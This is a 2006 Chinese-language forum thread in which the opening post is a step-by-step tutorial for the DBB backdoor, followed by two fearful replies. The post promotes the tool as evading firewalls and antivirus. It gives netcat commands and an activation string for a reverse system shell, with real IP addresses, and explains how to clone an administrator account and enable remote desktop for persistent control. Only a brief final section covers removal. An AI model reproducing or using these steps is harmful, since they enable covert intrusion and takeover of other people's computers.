廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 2323 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
穿梭于防火牆下的黑馬 DBB後門程式
穿梭于防火牆下的黑馬 DBB後門程式

今天要為大家介紹的DarkStorm BePassFireWall BackDoor V1.2是一款成功率極高的反彈端口穿透防火牆的後門程式(以下簡稱DBB),可以穿透99%的防火牆。該後門採用線程插入技術,隱蔽性極高,在系統中以服務形式載入,擁有system許可權,一旦運行,很難將其刪除。同時,最重要的是,現在還沒有殺毒軟體能夠查殺它,可以說是現在理想的後門程式了。下面就讓我們一起來領略一下DBB的獨到魅力吧!
  一、配置後門
  第一步當然是把DBB當回家,在使用後門前,請先用壓縮包內的config DarkStorm.exe程式配置後門。雙擊運行config DarkStorm.exe,打開如圖1所示的配置對話窗口,根據提示輸入相關數據。其實,該後門支援不經過配置就可直接使用,這時將使用後門的默認配置:反向連接端口是8888,關鍵字是NOIR,服務名是DNScnsvc。

  小提示:DBB後門服務端由DarkStorm.exe和DarkStorm.dll組成,這兩個exe和DLL文件是可以改名的,但是必須要改成同樣的名字,比如,可以把exe文件改名為123.exe,那麼dll文件也要相應的改名為123.dll。
  二、打開後門
  要運行後門很簡單,只要將exe和dll文件上傳到遠程主機上之後,直接運行exe文件,後門即可被載入。
  小提示:exe文件和dll文件不必一定要放到system32中,但必須在同一文件夾下。
  大家都知道,現在很多情況下主機是在防火牆後面的,如何讓後門來逃避防火牆的火眼金睛呢?這就需要用反向連接功能。DBB是通過嗅探激活字符來啟動反向連接的,僅支援nc反向連接。
  首先在本地電腦中使用nc監聽本地電腦的8888端口,進入命令行狀態,運行如下命令: nc -l -p 8888。然後再用nc連接目標主機的任何一個防火牆允許的TCP端口(80/139/445.....),接著再開一個命令行窗口,運行命令:nc 220.202.242.101 139,然後輸入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101為木馬服務端IP地址,NOIR為反彈激活字,220.202.242.98:8888為反向連接的IP地址,也就是本機IP地址及端口。如果反向連接成功,就會在本地電腦中得到目標主機的一個系統許可權SHELL(如圖2)。

  小提示:本地電腦即接受反向SHELL的系統,必須擁有獨立公網IP上網的電腦。另外,由於該後門使用的是無驅動的嗅探,無法嗅探本機對本機發起的數據請求,所以在對本機的測試中,是無法成功的。
  三、輕鬆操縱
  當成功獲取了目標電腦的一個系統許可權的SHELL後,就等於已經手握該台電腦的生殺大權。令人更加欣喜的是,DBB還擁有一些非常實用的控制功能。
  1.帳戶克隆
  為了下次能夠順利控制目標電腦,一般的手法就是克隆一個系統許可權的帳戶,在這裡,使用clone命令就可以輕鬆克隆一個本地用戶。其語法格式為:clone username clonename password,其中,username是被克隆的用戶的用戶名,一般是administrator;clonename是你要克隆為username的用戶名,一般是guest;password是你為克隆用戶設置的密碼,最長32位。例如,要把Guest克隆為管理員帳戶,並且設置密碼為snow,就只要運行命令:clone administrator guest snow(如圖3)。

  2.開啟終端服務
  遠程終端服務可以說是最為理想的遠程式控制制方式,因此,當成功入侵目標電腦後,大部分人總是想方設法來開啟被控電腦的終端服務。雖然說開啟3389終端服務的方法有很多,可都是有一定難度的。不過還好,有了該後門,只要用一條命令就可以輕鬆開啟3389服務,其命令為:term port。例如:運行命令“term 3389”(如圖4),這樣就將開啟目標電腦的端終服務,終端服務通訊端口為3389,重新啟動電腦即可生效。

  小提示:終端服務只在Windows 2000伺服器以上版本才擁有。
  3.進程管理
  想知道目標電腦運行了哪些程式嗎?很簡單,運行命令:pslist,這樣就可以顯示本地所有用戶進程和相對應的pid號。如果想結束某一進程的運行,請運行命令:pskill pid,提示:pid指的是進程ID號(如圖5)。

  另外,還有諸如Logoff(登出當前用戶)、Reboot(重啟系統)、Shutdown(關閉系統)、Poweroff(關閉電源)等命令可供使用。
  四、封殺後門
  如果不幸中了該後門,可以通過如下方法來刪除。打開註冊表編輯器,依次展開如下子鍵:HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
  Services,找到並刪除該子鍵下的DNScnsvc鍵(如圖6),再重新啟動系統即可。若服務名是自己設定的,請刪除相關服務名的子鍵。



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:臺灣和信超媒體寬帶網 | Posted:2006-12-03 02:56 |
紫炎蒼龍
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x12
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

感謝大大的分享,真是可怕的程式,有解決的辦法嗎?,有的話請大大再次分享,謝謝囉


獻花 x0 回到頂端 [1 樓] From:臺灣 | Posted:2006-12-03 20:21 |
patience99
數位造型
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x0
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
Re:穿梭於防火牆下的黑馬 DBB後門程式
不懂不怕~懂越多真是越可怕!
建議拔掉網路線~.~"


一句鼓勵的話 可改變一個人的觀念與行為,甚至改變一個人的命運!
獻花 x0 回到頂端 [2 樓] From:臺灣數位聯合 | Posted:2006-12-04 01:28 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.057706 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言